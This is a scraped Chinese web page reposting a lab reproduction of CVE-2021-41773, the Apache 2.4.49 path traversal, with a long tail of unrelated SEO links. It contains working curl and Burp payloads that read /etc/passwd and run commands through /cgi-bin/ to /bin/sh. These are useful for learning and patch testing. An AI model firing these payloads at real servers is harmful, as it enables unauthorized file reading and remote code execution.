当前位置: 首页 > news >正文

推荐几个安全没封的网站wordpress 火车头发布

推荐几个安全没封的网站,wordpress 火车头发布,团购网站建设,wordpress整站克隆感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞验证方式一 curl方式二 bp抓包 说明内容漏洞编号CVE-2021-41773漏洞名称Apache HTTP 路径穿越漏洞漏…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 1、基础环境
        • 2、漏洞验证
          • 方式一 curl
          • 方式二 bp抓包

说明内容
漏洞编号CVE-2021-41773
漏洞名称Apache HTTP 路径穿越漏洞
漏洞评级高危
影响范围2.4.49
漏洞描述在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件
修复方案

1.1、漏洞描述

Apache HTTP服务器项目致力于为现代操作系统(包括UNIX和Windows)开发和维护开源HTTP服务器。

在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果CGI脚本也为这些别名路径启用,则可以允许远程代码执行。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2021-41773


启动测试环境:

sudo docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到

在这里插入图片描述

2、漏洞验证
方式一 curl

/icons/必须是现有目录

curl -v --path-as-is http://192.168.80.141:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

在服务器上启用mods cgicgid后,此路径遍历漏洞将允许执行任意命令

curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

在这里插入图片描述

方式二 bp抓包
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
echo;id

在这里插入图片描述

http://www.15wanjia.com/news/189181.html

相关文章:

  • 冀州网站制作WordPress当前菜单高亮
  • 广州一起做网店网站官方wordpress 更新网站
  • 做网站收费 知乎wordpress 移动主题
  • 筹划建设协会网站的方案哈尔滨精品建站
  • 家庭农场网站建设网站开发建设合同模板
  • 网站备案幕布设计少儿编程加盟机构
  • 国内优秀企业网站欣赏东营招标投标信息网
  • 网站制作的知识深圳注册公司条件
  • 做网站之前要先购买服务器吗安卓手机优化软件哪个好
  • 怎样学网站开发做阀门网站电话
  • 网站建设系统总体结构功能图专业的网站建设公
  • 学校网站开发与设计html5单页网站模板
  • 企业信息平台网站官网 最新版地址在线
  • 三水网站制作做网站有哪些语言
  • 徐州网站开发培训做建材商城网站
  • 惠山区住房和建设厅网站网站权限设计
  • 网站免费视频迅速让一个wordpress
  • 电子商务网站订单功能wordpress移动端顶部菜单
  • wordpress 漫画站居家养老网站建设
  • wordpress 网站播放器佛山市网站建设哪家好
  • 北京婚纱摄影网站网页设计师收费标准
  • 做网站销售好不好wordpress 表格主题
  • 网站如何做美工ps做ppt模板怎么下载网站
  • 数码网站模板中国旅游网站排名
  • 如何建立网站站点微信小程序原生开发
  • 高端网站教建设wordpress 从新安装
  • 大连网站的公司外贸平台有哪些分别对应哪个市场
  • 山东平台网站建设设计在线网页代理免费版
  • 用c 建网站时怎么做导航菜单栏发布企业信息的网站
  • 深圳做网站大公司实名域名购买